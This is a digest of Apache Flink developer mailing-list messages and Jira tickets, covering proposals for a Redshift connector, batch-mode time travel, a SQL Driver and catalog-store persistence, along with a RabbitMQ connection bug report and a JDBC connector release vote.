 URL: https://issues.apache.org/jira/browse/FLINK-32225
 Project: Flink
  Issue Type: Technical Debt
  Components: Runtime / Coordination
Reporter: Weihua Hu
 Fix For: 1.18.0


As discussed in https://github.com/apache/flink/pull/22674

TaskDeploymentDescriptorFactory#fromExecution needs to retrieve several fields 
from the ExecutionGraphAccessor.  We could introduce a new 
TaskDeploymentDescriptorConfiguration to merge all these fields to make the 
EG/TaskDeploymentDescriptor more readable.




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSS] FLIP-307: Flink connector Redshift

2023-05-31 Thread Samrat Deb
Hi Liu Ron,

> 1. Regarding the `read.mode` and `write.mode`, you say it provides two
modes, respectively jdbc and `unload or copy`. What is the default value
for `read.mode` and `write.mode`?

I have made an effort to make the configuration options `read.mode` and
`write.mode` mandatory for the "flink-connector-redshift" according to
FLIP[1]. The rationale behind this decision is to empower users who are
familiar with their Redshift setup and have specific expectations for the
sink. By making these configurations mandatory, users can have more control
and flexibility in configuring the connector to meet their requirements.

However, I am open to receiving feedback on whether it would be beneficial
to make the configuration options non-mandatory and set default values for
them. If you believe there are advantages to having default values or any
other suggestions, please share your thoughts. Your feedback is highly
appreciated.

>  2. For Source, does it both support batch read and streaming read?

Redshift currently does not provide native support for streaming reads,
although it does support streaming writes[2]. As part of the plan, I intend
to conduct a proof of concept and benchmarking to explore the possibilities
of implementing streaming reads using the Flink JDBC connector, as Redshift
is JDBC compatible.
However, it is important to note that the initial source
implementation will focus primarily on supporting batch reads
rather than streaming reads. This approach will allow us to deliver a
robust and reliable batch-read solution in phase 2 of the
implementation.

[1]
https://cwiki.apache.org/confluence/display/FLINK/FLIP-307%3A++Flink+Connector+Redshift
[2]
https://docs.aws.amazon.com/redshift/latest/dg/materialized-view-streaming-ingestion.html

Bests,
Samrat

On Wed, May 31, 2023 at 8:03 AM liu ron  wrote:

> Hi, Samrat
>
> Thanks for driving this FLIP. It looks like supporting
> flink-connector-redshift is very useful to Flink. I have two question:
> 1. Regarding the `read.mode` and `write.mode`, you say it provides two
> modes, respectively jdbc and `unload or copy`. What is the default value
> for `read.mode` and `write.mode`?
> 2. For Source, does it both support batch read and streaming read?
>
>
> Best,
> Ron
>
> On Tue, May 30, 2023 at 17:15 Samrat Deb  wrote:
>
> > [1]
> >
> >
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-307%3A++Flink+Connector+Redshift
> >
> > [note] Missed the trailing link for previous mail
> >
> >
> >
> > On Tue, May 30, 2023 at 2:43 PM Samrat Deb 
> wrote:
> >
> > > Hi Leonard,
> > >
> > > > and I’m glad to help review the design as well as the code review.
> > > Thank you so much. It would be really great and helpful to bring
> > > flink-connector-redshift for flink users :) .
> > >
> > > I have divided the implementation in 3 phases in the `Scope`
> Section[1].
> > > 1st phase is to
> > >
> > >- Integrate with Flink Sink API (*FLIP-171*
> > ><
> > https://cwiki.apache.org/confluence/display/FLINK/FLIP-171%3A+Async+Sink
> >
> > >)
> > >
> > >
> > > > About the implementation phases, How about prioritizing support for
> the
> > > Datastream Sink API and TableSink API in the first phase?
> > > I can completely resonate with you to prioritize support for Datastream
> > > Sink API and TableSink API in the first phase.
> > > I will update the FLIP[1] as you have suggested.
> > >
> > > > It seems that the primary use cases for the Redshift connector are
> > > acting as a sink for processed data by Flink.
> > > Yes, majority ask and requirement for Redshift connector is sink for
> > > processed data by Flink.
> > >
> > > Bests,
> > > Samrat
> > >
> > > On Tue, May 30, 2023 at 12:35 PM Leonard Xu  wrote:
> > >
> > >> Thanks @Samrat for bringing this discussion.
> > >>
> > >> It makes sense to me to introduce AWS Redshift connector for Apache
> > >> Flink, and I’m glad to help review the design as well as the code
> > review.
> > >>
> > >> About the implementation phases, How about prioritizing support for
> the
> > >> Datastream Sink API and TableSink API in the first phase? It seems
> that
> > the
> > >> primary use cases for the Redshift connector are acting as a sink for
> > >> processed data by Flink.
> > >>
> > >> Best,
> > >> Leonard
> > >>
> > >>
> > >> > On May 29, 2023, at 12:51 PM, Samrat Deb 
> > wrote:
> > >> >
> > >> > Hello all ,
> > >> >
> > >> > Context:
> > >> > Amazon Redshift [1] is a fully managed, petabyte-scale data
> warehouse
> > >> > service in the cloud. It allows analyzing data without all of the
> > >> > configurations of a provisioned data warehouse. Resources are
> > >> automatically
> > >> > provisioned and data warehouse capacity is intelligently scaled to
> > >> deliver
> > >> > fast performance for even the most demanding and unpredictable
> > >> workloads.
> > >> > Redshift is one of the widely used warehouse solutions in the
> current
> > >> > market.
> > >> >
> > >> > Building flink connector 

Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode

2023-05-31 Thread Krzysztof Chmielewski
Ok, after second thought, I'm retracting my previous statement about the Catalog
changes you proposed.
I do see a benefit for the Delta connector with this change, and I see
why this could be coupled with the Catalog.

The Delta Connector's SQL support also ships a Delta Catalog implementation for
Flink.
For the Delta Catalog, table schema information is fetched from the underlying
_delta_log and not stored in the metastore. For time travel we actually had a
problem: if we wanted to travel back to some old version whose schema was
slightly different, we would have a conflict, since the Catalog would return the
current schema and not the schema as it was for version X.

With your change, our Delta Catalog can actually fetch the schema for version X
and send it to DeltaTableFactory. Currently, the Catalog can fetch only the current
version. What we would also need, however, is the version (number/timestamp) for
this table passed to the DynamicTableFactory so we could properly set up the Delta
standalone library.
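
For reference, my understanding of the Catalog extension proposed in this FLIP,
as a sketch only (the exact signature and exception contract are my assumptions):

```
// Sketch of the method this thread describes being added to
// org.apache.flink.table.catalog.Catalog.
default CatalogBaseTable getTable(ObjectPath tablePath, long timestamp)
        throws TableNotExistException, CatalogException {
    // Catalogs without versioning support would simply reject time travel.
    throw new UnsupportedOperationException("Time travel is not supported.");
}
```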

Regards,
Krzysztof

On Wed, May 31, 2023 at 10:37 Krzysztof Chmielewski <
krzysiek.chmielew...@gmail.com> wrote:

> Hi,
> happy to see such a feature.
> Small note from my end regarding Catalog changes.
>
> TL;DR
> I don't think it is necessary to delegate this feature to the catalog. I
> think that since "time travel" is a per-job/query property, it should not be
> coupled with the Catalog or table definition. In my opinion this is
> something that only the DynamicTableFactory has to know about. I would rather
> see this feature as it is - an SQL syntax enhancement - but delegate it clearly
> to DynamicTableFactory.
>
> I've implemented the time travel feature for the Delta Connector [1] using
> the current Flink API.
> Docs are pending code review, but you can find them here [2], and examples
> are available here [3].
>
> The time travel feature that I've implemented is based on Flink query
> hints:
> "SELECT * FROM sourceTable /*+ OPTIONS('versionAsOf' = '1') */"
>
> The "versionAsOf" (we also have 'timestampAsOf') parameter is handled not
> by the Catalog but by the DynamicTableFactory implementation for the Delta
> connector. The value of this property is passed to the Delta standalone lib
> API, which returns the table view for the given version.
>
> I'm not sure how/if proposed change could benefit Delta connector
> implementation for this feature.
>
> Thanks,
> Krzysztof
>
> [1]
> https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/flink
> [2] https://github.com/kristoffSC/connectors/tree/FlinkSQL_PR_15-docs
> [3]
> https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/examples/flink-example/src/main/java/org/example/sql
>
> On Wed, May 31, 2023 at 06:03 liu ron  wrote:
>
>> Hi, Feng
>>
>> Thanks for driving this FLIP. Time travel is very useful for integrating
>> Flink with data lake systems. I have one question: why is the
>> implementation
>> of TimeTravel delegated to the Catalog? Assuming that we use Flink to query
>> a Hudi table with the time travel syntax, but we don't use the HudiCatalog
>> and instead register the Hudi table in the InMemoryCatalog, can we support
>> time travel for the Hudi table in this case?
>> In contrast, I think time travel should be bound to the connector instead of
>> the Catalog, so the rejected alternative should be considered.
>>
>> Best,
>> Ron
>>
>> yuxia  于2023年5月30日周二 09:40写道:
>>
>> > Hi, Feng.
>> > Notice this FLIP only supports batch mode for time travel. Would it also
>> > make sense to support stream mode to read a snapshot of the table as a
>> > bounded stream?
>> >
>> > Best regards,
>> > Yuxia
>> >
>> > - Original Message -
>> > From: "Benchao Li" 
>> > To: "dev" 
>> > Sent: Monday, May 29, 2023 6:04:53 PM
>> > Subject: Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode
>> >
>> > # Can Calcite support this syntax ` VERSION AS OF`  ?
>> >
>> > This also depends on whether this is defined in standard or any known
>> > databases that have implemented this. If not, it would be hard to push
>> it
>> > to Calcite.
>> >
>> > # getTable(ObjectPath object, long timestamp)
>> >
>> > Then we again come to the problem of "casting between timestamp and
>> > numeric", which has been disabled in FLINK-21978[1]. If you're gonna use
>> > this, then we need to clarify that problem first.
>> >
>> > [1] https://issues.apache.org/jira/browse/FLINK-21978
>> >
>> >
>> > On Mon, May 29, 2023 at 15:57 Feng Jin  wrote:
>> >
>> > > hi, thanks for your reply.
>> > >
>> > > @Benchao
>> > > > did you consider the pushdown abilities compatible
>> > >
>> > > In the current design, the implementation of TimeTravel is delegated
>> to
>> > > Catalog. We have added a function called getTable(ObjectPath
>> tablePath,
>> > > long timestamp) to obtain the corresponding CatalogBaseTable at a
>> > specific
>> > > time.  Therefore, I think it will not have any impact on the original
>> > > pushdown abilities.
>> > >
>> > >
>> > > >   I see there is a rejected  design for adding SupportsTimeTravel,
>> but
>> > I
>> > > didn't see the alternative in  the FLIP doc
>> > >
>> > > Sorry, 

Re: [DISCUSS] FLIP-316: Introduce SQL Driver

2023-05-31 Thread Paul Lam
Hi Shengkai,

Thanks a lot for your comments! Please see my comments inline.
 
> 1. The FLIP does not specify the kind of SQL that will be submitted with
> the application mode. I believe only a portion of the SQL will be delegated
> to the SqlRunner.

You’re right. For SQL Gateway, only DMLs need to be delegated to the SQL
Driver. I would think about the details and update the FLIP. Do you have some
ideas already?

> 2. Will the SQL Client/Gateway perform any validation before submitting the
> SQL to the SqlRunner? If the user's SQL is invalid, it could take a long
> time to fetch error messages before execution.

Yes, I think so. We could introduce a SQL Gateway option like 
`sql-gateway.application.validate-sql`, which determines if the Gateway
should do the SQL validation by compiling the plan.
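
A sketch of what that option could look like (the option name comes from this
thread; it doesn’t exist in Flink yet, and the default value is just a suggestion):

```
import org.apache.flink.configuration.ConfigOption;
import org.apache.flink.configuration.ConfigOptions;

// Hypothetical SQL Gateway option, as discussed above.
public static final ConfigOption<Boolean> VALIDATE_SQL =
        ConfigOptions.key("sql-gateway.application.validate-sql")
                .booleanType()
                .defaultValue(true)
                .withDescription(
                        "Whether the gateway validates a statement by compiling"
                                + " its plan before submitting it in application mode.");
```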

> 3. ExecNodeGraph VS SQL File

ExecNodeGraph looks good to me. It’s not efficient to rebuild the 
same TableEnvironment from scratch with SQL files at JobManager.
ExecNodeGraph avoids that.

Then I think SQL Driver should accept both SQL files and ExecNodeGraph,
with the former for public usage and the latter for internal usage.

> 4. SqlRunner VS ApplicationRunner


ApplicationRunner looks good for SQL Driver at first glance, but 
I’m afraid it has two limitations:

1) IIUC, ApplicationRunner should only be used in application mode, but
SQL Driver actually could be used in other deployment modes as well.
2) As FLIP-85 said, ApplicationRunner doesn’t work well with YARN.

What do you think?

> 5. K8S Application mode

WRT K8s application mode, I think it’s more of the users’ responsibility to
prepare the basic resources by customizing the image.

For non-SQL-gateway scenarios, the image should contain everything 
needed for the SQLs.

For SQL-gateway scenarios, that’s actually a missing part that we need to
discuss. The gateway-generated resources (e.g. ExecNodeGraph) can’t be
accessed at JobManager, unless:

1) use web submission to deploy and run jars
2) mount a distributed storage to both SQL gateway and all nodes that 
Flink runs on

I lean toward the web submission way but haven't thought through the details yet.

BTW, it seems that we don’t need `pipeline.jars` on K8s, we could put the 
jars into the classpath directly.

> 6. Could you add more details about your modification in the gateway side,
> including error handling, execution workflow, and the impact on job
> statements?

Sure. I’ll let you know when I finish the details.

Paul Lam

> On May 31, 2023, at 10:56, Shengkai Fang  wrote:
> 
> Thanks for the proposal. The Application mode is very important to Flink
> SQL. But I have some questions about the FLIP:
> 
> 1. The FLIP does not specify the kind of SQL that will be submitted with
> the application mode. I believe only a portion of the SQL will be delegated
> to the SqlRunner.
> 2. Will the SQL Client/Gateway perform any validation before submitting the
> SQL to the SqlRunner? If the user's SQL is invalid, it could take a long
> time to fetch error messages before execution.
> 3. ExecNodeGraph VS SQL File
> 
> Initially, we planned to use ExecNodeGraph as the essential information to
> be submitted. By enabling 'table.plan.compile.catalog-objects' = 'all', the
> ExecNodeGraph provides necessary information about the session state.
> ExecNodeGraph contains the basic structure of tables and the class name of
> catalog functions used, which enables us to avoid serializing the catalog
> to the remote. Therefore, we prefer to use ExecGraph as the content
> submitted. Furthermore, our internal implementation can extend ExecGraph
> beyond state compatibility.
> 
> 4. SqlRunner VS ApplicationRunner
> 
> In the FLIP-85, it mentions to support Library mode. Compared to adding a
> new module, I think it's better to extend the origin design? WDYT?
> 
> ApplicationRunner.run((StreamExecutionEnvironment env) -> {
> 
>  … // a consumer of the env
> 
> })
> 
> 5. K8S Application mode
> 
> As far as I know, K8S doesn't support shipping multiple jars to the remote.
> It seems the current design also doesn't support K8S Application mode?
> 
> https://github.com/apache/flink/blob/master/flink-kubernetes/src/main/java/org/apache/flink/kubernetes/KubernetesClusterDescriptor.java#L217
> 
> 6. Could you add more details about your modification in the gateway side,
> including error handling, execution workflow, and the impact on job
> statements?
> 
> Best,
> Shengkai
> 
> On Wed, May 31, 2023 at 10:40 Shammon FY  wrote:
> 
>> Thanks Paul for driving this proposal.
>> 
>> I found the SQL driver has no config-related options. If I understand
>> correctly, the SQL driver can be used to submit SQL jobs in a 'job
>> submission service' such as sql-gateway. In general, in addition to the
>> default config for Flink cluster which includes k8s, ha and .etc, users may
>> also specify configurations for SQL jobs, including parallelism, number of
>> Task Managers, etc.
>> 
>> For example, in sql-gateway users can `set` dynamic parameters 

[jira] [Created] (FLINK-32224) Unable to connect multiple host using RabbitMQ Connector

2023-05-31 Thread someshwar (Jira)
someshwar created FLINK-32224:
-

 Summary: Unable to connect multiple host using RabbitMQ Connector
 Key: FLINK-32224
 URL: https://issues.apache.org/jira/browse/FLINK-32224
 Project: Flink
  Issue Type: Bug
  Components: Connectors / RabbitMQ
Affects Versions: 1.14.2
Reporter: someshwar
 Fix For: 1.14.2


I have used the same implementation provided in the link below:
[https://nightlies.apache.org/flink/flink-docs-release-1.17/docs/connectors/datastream/rabbitmq/]

When I use multiple hosts separated by commas, I get the issue below:
 

at 
org.apache.flink.streaming.connectors.rabbitmq.RMQSource.open(RMQSource.java:267)
    at 
org.apache.flink.api.common.functions.util.FunctionUtils.openFunction(FunctionUtils.java:34)
    at 
org.apache.flink.streaming.api.operators.AbstractUdfStreamOperator.open(AbstractUdfStreamOperator.java:100)
    at 
org.apache.flink.streaming.runtime.tasks.RegularOperatorChain.initializeStateAndOpenOperators(RegularOperatorChain.java:110)
    at 
org.apache.flink.streaming.runtime.tasks.StreamTask.restoreGates(StreamTask.java:711)
    at 
org.apache.flink.streaming.runtime.tasks.StreamTaskActionExecutor$SynchronizedStreamTaskActionExecutor.call(StreamTaskActionExecutor.java:100)
    at 
org.apache.flink.streaming.runtime.tasks.StreamTask.restoreInternal(StreamTask.java:687)
    at 
org.apache.flink.streaming.runtime.tasks.StreamTask.restore(StreamTask.java:654)
    at 
org.apache.flink.runtime.taskmanager.Task.runWithSystemExitMonitoring(Task.java:958)
    at org.apache.flink.runtime.taskmanager.Task.restoreAndInvoke(Task.java:927)
    at org.apache.flink.runtime.taskmanager.Task.doRun(Task.java:766)
    at org.apache.flink.runtime.taskmanager.Task.run(Task.java:575)
    at java.base/java.lang.Thread.run(Thread.java:834)
Caused by: java.net.UnknownHostException: No such host is known 
(10.36.2.253,10.36.2.254,10.36.2.255)
    at java.base/java.net.Inet6AddressImpl.lookupAllHostAddr(Native Method)
    at 
java.base/java.net.InetAddress$PlatformNameService.lookupAllHostAddr(InetAddress.java:928)
    at 
java.base/java.net.InetAddress.getAddressesFromNameService(InetAddress.java:1514)
    at 
java.base/java.net.InetAddress$NameServiceAddresses.get(InetAddress.java:847)
    at java.base/java.net.InetAddress.getAllByName0(InetAddress.java:1504)
    at java.base/java.net.InetAddress.getAllByName(InetAddress.java:1363)
    at java.base/java.net.InetAddress.getAllByName(InetAddress.java:1297)
    at 
com.rabbitmq.client.DnsRecordIpAddressResolver.resolveIpAddresses(DnsRecordIpAddressResolver.java:83)
    at 
com.rabbitmq.client.DnsRecordIpAddressResolver.getAddresses(DnsRecordIpAddressResolver.java:73)
    at 
com.rabbitmq.client.impl.recovery.RecoveryAwareAMQConnectionFactory.newConnection(RecoveryAwareAMQConnectionFactory.java:58)
    at 
com.rabbitmq.client.impl.recovery.AutorecoveringConnection.init(AutorecoveringConnection.java:156)
    at 
com.rabbitmq.client.ConnectionFactory.newConnection(ConnectionFactory.java:1130)
    at 
com.rabbitmq.client.ConnectionFactory.newConnection(ConnectionFactory.java:1087)
    at 
com.rabbitmq.client.ConnectionFactory.newConnection(ConnectionFactory.java:1045)
    at 
com.rabbitmq.client.ConnectionFactory.newConnection(ConnectionFactory.java:1207)
    at 
org.apache.flink.streaming.connectors.rabbitmq.RMQSource.setupConnection(RMQSource.java:204)
    at 
org.apache.flink.streaming.connectors.rabbitmq.RMQSource.open(RMQSource.java:240)
    ... 12 more
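
For reference, the underlying RabbitMQ Java client does support connecting to 
multiple brokers, but the connector's RMQConnectionConfig accepts a single host, 
so the comma-separated string is resolved as one hostname (as the 
UnknownHostException above shows). A sketch of the client-level call (illustrative 
only; this is not connector API):

{code:java}
import com.rabbitmq.client.Address;
import com.rabbitmq.client.Connection;
import com.rabbitmq.client.ConnectionFactory;

ConnectionFactory factory = new ConnectionFactory();
factory.setUsername("user");
factory.setPassword("password");
// Parses "host1,host2,host3" into individual broker addresses.
Address[] addresses = Address.parseAddresses("10.36.2.253,10.36.2.254,10.36.2.255");
// Tries the brokers in order instead of resolving the whole string as one host.
Connection connection = factory.newConnection(addresses);
{code}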



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32223) Add Hive delegation token support

2023-05-31 Thread qingbo jiao (Jira)
qingbo jiao created FLINK-32223:
---

 Summary: Add Hive delegation token support 
 Key: FLINK-32223
 URL: https://issues.apache.org/jira/browse/FLINK-32223
 Project: Flink
  Issue Type: Improvement
Reporter: qingbo jiao






--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSS] FLIP 295: Support persistence of Catalog configuration and asynchronous registration

2023-05-31 Thread Shammon FY
Hi Feng,

Thanks for updating. I have some minor comments:

1. The modification of `CatalogManager` should not be in `Public
Interfaces`, it is not a public interface.

2. `@PublicEvolving` should be added for `CatalogStore` and
`CatalogStoreFactory`

3. The code `Optional<Catalog> optionalDescriptor =
catalogStore.get(catalogName);` in the `CatalogManager` should be
`Optional<CatalogDescriptor> optionalDescriptor =
catalogStore.get(catalogName);`
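
For clarity, the CatalogStore surface I'm referring to, assembled from this
thread as a sketch (the exact signatures are still under discussion):

```
@PublicEvolving
public interface CatalogStore {

    /** Stores only the catalog's configuration, not an initialized Catalog instance. */
    void storeCatalog(String catalogName, CatalogDescriptor descriptor);

    /** Returns the stored configuration; initialization happens lazily in CatalogManager. */
    CatalogDescriptor getCatalog(String catalogName);
}
```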

Best,
Shammon FY


On Wed, May 31, 2023 at 2:24 PM liu ron  wrote:

> Hi, Feng
>
> Thanks for driving this FLIP, this proposal is very useful for catalog
> management.
> I have some small questions:
>
> 1. Regarding the CatalogStoreFactory#createCatalogStore method, do we need
> to provide a default implementation?
> 2. If we get a Catalog from CatalogStore, after initializing it, do we
> put it into `Map<String, Catalog> catalogs` again?
> 3. Regarding the options `sql.catalog.store.type` and
> `sql.catalog.store.file.path`, how about renaming them to
> `catalog.store.type` and `catalog.store.path`?
>
> Best,
> Ron
>
> On Mon, May 29, 2023 at 21:19 Feng Jin  wrote:
>
> > Hi yuxia
> >
> >  > But from the code in Proposed Changes, once we register the Catalog,
> we
> > initialize it and open it. right?
> >
> > Yes. In order to avoid inconsistent semantics of the original CREATE
> > CATALOG DDL, Catalog will be directly initialized in registerCatalog so
> > that parameter validation can be performed.
> >
> > In the current design, lazy initialization is mainly reflected in
> > getCatalog. If CatalogStore has already saved some catalog
> configurations,
> > only initialization is required in getCatalog.
> >
> >
> > Best,
> > Feng
> >
> > On Mon, May 29, 2023 at 8:27 PM yuxia 
> wrote:
> >
> > > Hi, Feng.
> > > I'm trying to understand the meaning of *lazy initialization*. If
> I'm
> > > wrong, please correct me.
> > >
> > > IIUC, lazy initialization means you initialize the catalog only when you
> > > need to access it. But from the code in Proposed Changes, once we
> > register
> > > the Catalog,
> > > we initialize it and open it. right?
> > >
> > > Best regards,
> > > Yuxia
> > >
> > > - Original Message -
> > > From: "Jing Ge" 
> > > To: "dev" 
> > > Sent: Monday, May 29, 2023 5:12:46 PM
> > > Subject: Re: [DISCUSS] FLIP 295: Support persistence of Catalog
> configuration
> > > and asynchronous registration
> > >
> > > Hi Feng,
> > >
> > > Thanks for your effort! +1 for the proposal.
> > >
> > > One of the major changes is that the current design will provide
> > > Map<String, Catalog> catalogs as a snapshot instead of a cache, which
> > means
> > > once it has been initialized, any changes done by other sessions will
> not
> > > affect it. Point 6 describes follow-up options for further improvement.
> > >
> > > Best regards,
> > > Jing
> > >
> > > On Mon, May 29, 2023 at 5:31 AM Feng Jin 
> wrote:
> > >
> > > > Hi all, I would like to update you on the latest progress of the
> FLIP.
> > > >
> > > >
> > > > Last week, Leonard Xu, HangRuan, Jing Ge, Shammon FY, ShengKai Fang
> > and I
> > > > had an offline discussion regarding the overall solution for Flink
> > > > CatalogStore. We have reached a consensus and I have updated the
> final
> > > > solution in FLIP.
> > > >
> > > > Next, let me briefly describe the entire design:
> > > >
> > > >    1. Introduce CatalogDescriptor to store catalog configuration, similar
> > > >    to TableDescriptor.
> > > >    2. The two key functions of CatalogStore - void storeCatalog(String
> > > >    catalogName, CatalogDescriptor) and CatalogDescriptor getCatalog(String)
> > > >    - will both use CatalogDescriptor instead of a Catalog instance. This
> > > >    way, CatalogStore will only be responsible for saving and retrieving
> > > >    catalog configurations without having to initialize catalogs.
> > > >    3. The default registerCatalog(String catalogName, Catalog catalog)
> > > >    function in CatalogManager will be marked as deprecated.
> > > >    4. A new function registerCatalog(String catalogName, CatalogDescriptor
> > > >    catalog) will be added to serve as the default registration function
> > > >    for catalogs in CatalogManager.
> > > >    5. Map<String, Catalog> catalogs in CatalogManager will remain unchanged
> > > >    and save initialized catalogs. This means that deletion operations from
> > > >    one session won't synchronize with other sessions.
> > > >    6. To support multi-session synchronization scenarios for deletions
> > > >    later on, we should make Map<String, Catalog> catalogs configurable.
> > > >    There may be three possible situations:
> > > >
> > > >    a. Default caching of all initialized catalogs.
> > > >
> > > >    b. Introduction of LRU cache logic which can automatically clear
> > > >    long-unused catalogs.
> > > >
> > > >    c. No caching of any instances; each call to getCatalog creates a new
> > > >    instance.
> > > >
> > > >
> > > > 

[jira] [Created] (FLINK-32222) Cassandra Source uses DataInputDeserializer and DataOutputSerializer non public apis

2023-05-31 Thread Etienne Chauchot (Jira)
Etienne Chauchot created FLINK-32222:


 Summary: Cassandra Source uses DataInputDeserializer and 
DataOutputSerializer non public apis
 Key: FLINK-32222
 URL: https://issues.apache.org/jira/browse/FLINK-32222
 Project: Flink
  Issue Type: Technical Debt
Reporter: Etienne Chauchot
Assignee: Etienne Chauchot


In class _CassandraSplitSerializer_, these non-public API usages violate
_ConnectorRules#CONNECTOR_CLASSES_ONLY_DEPEND_ON_PUBLIC_API_



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode

2023-05-31 Thread Krzysztof Chmielewski
Hi,
happy to see such a feature.
Small note from my end regarding Catalog changes.

TL;DR
I don't think it is necessary to delegate this feature to the catalog. I
think that since "time travel" is a per-job/query property, it should not be
coupled with the Catalog or table definition. In my opinion this is
something that only the DynamicTableFactory has to know about. I would rather
see this feature as it is - an SQL syntax enhancement - but delegate it clearly
to DynamicTableFactory.

I've implemented the time travel feature for the Delta Connector [1] using the
current Flink API.
Docs are pending code review, but you can find them here [2], and examples
are available here [3].

The time travel feature that I've implemented is based on Flink query hints:
"SELECT * FROM sourceTable /*+ OPTIONS('versionAsOf' = '1') */"

The "versionAsOf" (we also have 'timestampAsOf') parameter is handled not
by the Catalog but by the DynamicTableFactory implementation for the Delta
connector. The value of this property is passed to the Delta standalone lib
API, which returns the table view for the given version.
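
A simplified sketch of how the hint value reaches the connector (class names and
the helper method are illustrative, not the actual Delta connector code):

```
import java.util.Collections;
import java.util.Map;
import java.util.Set;
import org.apache.flink.configuration.ConfigOption;
import org.apache.flink.table.connector.source.DynamicTableSource;
import org.apache.flink.table.factories.DynamicTableSourceFactory;

public class DeltaTableFactory implements DynamicTableSourceFactory {

    @Override
    public DynamicTableSource createDynamicTableSource(Context context) {
        // Query hints like /*+ OPTIONS('versionAsOf' = '1') */ are merged into
        // the table options before the factory is invoked.
        Map<String, String> options = context.getCatalogTable().getOptions();
        String versionAsOf = options.get("versionAsOf");
        // Pass versionAsOf to the Delta standalone API to load that version's view.
        return createDeltaSource(versionAsOf);
    }

    @Override
    public String factoryIdentifier() {
        return "delta"; // illustrative
    }

    @Override
    public Set<ConfigOption<?>> requiredOptions() {
        return Collections.emptySet();
    }

    @Override
    public Set<ConfigOption<?>> optionalOptions() {
        return Collections.emptySet(); // 'versionAsOf' would be declared here
    }

    private DynamicTableSource createDeltaSource(String versionAsOf) {
        throw new UnsupportedOperationException("illustrative placeholder");
    }
}
```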

I'm not sure how/if proposed change could benefit Delta connector
implementation for this feature.

Thanks,
Krzysztof

[1]
https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/flink
[2] https://github.com/kristoffSC/connectors/tree/FlinkSQL_PR_15-docs
[3]
https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/examples/flink-example/src/main/java/org/example/sql

On Wed, May 31, 2023 at 06:03 liu ron  wrote:

> Hi, Feng
>
> Thanks for driving this FLIP. Time travel is very useful for integrating
> Flink with data lake systems. I have one question: why is the implementation
> of TimeTravel delegated to the Catalog? Assuming that we use Flink to query
> a Hudi table with the time travel syntax, but we don't use the HudiCatalog
> and instead register the Hudi table in the InMemoryCatalog, can we support
> time travel for the Hudi table in this case?
> In contrast, I think time travel should be bound to the connector instead of
> the Catalog, so the rejected alternative should be considered.
>
> Best,
> Ron
>
> On Tue, May 30, 2023 at 09:40 yuxia  wrote:
>
> > Hi, Feng.
> > Notice this FLIP only supports batch mode for time travel. Would it also
> > make sense to support stream mode to read a snapshot of the table as a
> > bounded stream?
> >
> > Best regards,
> > Yuxia
> >
> > - Original Message -
> > From: "Benchao Li" 
> > To: "dev" 
> > Sent: Monday, May 29, 2023 6:04:53 PM
> > Subject: Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode
> >
> > # Can Calcite support this syntax ` VERSION AS OF`  ?
> >
> > This also depends on whether this is defined in standard or any known
> > databases that have implemented this. If not, it would be hard to push it
> > to Calcite.
> >
> > # getTable(ObjectPath object, long timestamp)
> >
> > Then we again come to the problem of "casting between timestamp and
> > numeric", which has been disabled in FLINK-21978[1]. If you're gonna use
> > this, then we need to clarify that problem first.
> >
> > [1] https://issues.apache.org/jira/browse/FLINK-21978
> >
> >
> > On Mon, May 29, 2023 at 15:57 Feng Jin  wrote:
> >
> > > hi, thanks for your reply.
> > >
> > > @Benchao
> > > > did you consider the pushdown abilities compatible
> > >
> > > In the current design, the implementation of TimeTravel is delegated to
> > > Catalog. We have added a function called getTable(ObjectPath tablePath,
> > > long timestamp) to obtain the corresponding CatalogBaseTable at a
> > specific
> > > time.  Therefore, I think it will not have any impact on the original
> > > pushdown abilities.
> > >
> > >
> > > >   I see there is a rejected  design for adding SupportsTimeTravel,
> but
> > I
> > > didn't see the alternative in  the FLIP doc
> > >
> > > Sorry, the document description is not very clear.  Regarding whether
> to
> > > support SupportTimeTravel, I have discussed it with yuxia. Since we
> have
> > > already passed the corresponding time in getTable(ObjectPath, long
> > > timestamp) of Catalog, SupportTimeTravel may not be necessary.
> > >
> > > In getTable(ObjectPath object, long timestamp), we can obtain the
> schema
> > of
> > > the corresponding time point and put the SNAPSHOT that needs to be
> > consumed
> > > into options.
> > >
> > >
> > > @Shammon
> > > > Could we support this in Flink too?
> > >
> > > I personally think it's possible, but limited by Calcite's syntax
> > > restrictions. I believe we should first support this syntax in Calcite.
> > > Currently, I think it may not be easy  to support this syntax in
> Flink's
> > > parser. @Benchao, what do you think? Can Calcite support this syntax
> > > ` VERSION AS OF`  ?
> > >
> > >
> > > Best,
> > > Feng.
> > >
> > >
> > > On Fri, May 26, 2023 at 2:55 PM Shammon FY  wrote:
> > >
> > > > Thanks Feng, the feature of time travel sounds great!
> > > >
> > > > In addition to SYSTEM_TIME, lake houses such as paimon and iceberg
> > > support
> > > > snapshot or version. For example, users can query 

Re: [VOTE] Release flink-connector-jdbc v3.1.1, release candidate #1

2023-05-31 Thread Leonard Xu
+1 (binding)

- built from source code succeeded
- verified signatures
- verified hashsums 
- checked Github release tag, left one minor comment about the release commit
- checked release notes
- checked the contents contains jar and pom files in apache repo 
- reviewed the web PR 

Best,
Leonard


> On May 30, 2023, at 1:56 PM, Yuxin Tan  wrote:
> 
> +1 (non-binding)
> 
> - Checked sign
> - Checked the hash
> - Checked tag
> - Build from source
> 
> Best,
> Yuxin
> 
> 
> On Mon, May 29, 2023 at 14:14 weijie guo  wrote:
> 
>> +1 (non-binding)
>> 
>> - checked sign and checksum
>> - checked tag in github repository
>> - compiled from source
>> - checked the web PR
>> 
>> BTW, please remember to update docs/jdbc.yaml for the v3.1 branch after the
>> release is completed.
>> 
>> Best regards,
>> 
>> Weijie
>> 
>> 
>> On Mon, May 29, 2023 at 04:26 Jing Ge  wrote:
>> 
>>> +1 (non-binding)
>>> 
>>> - checked sign
>>> - checked hash
>>> - checked repos
>>> - checked tag
>>> - compiled from source
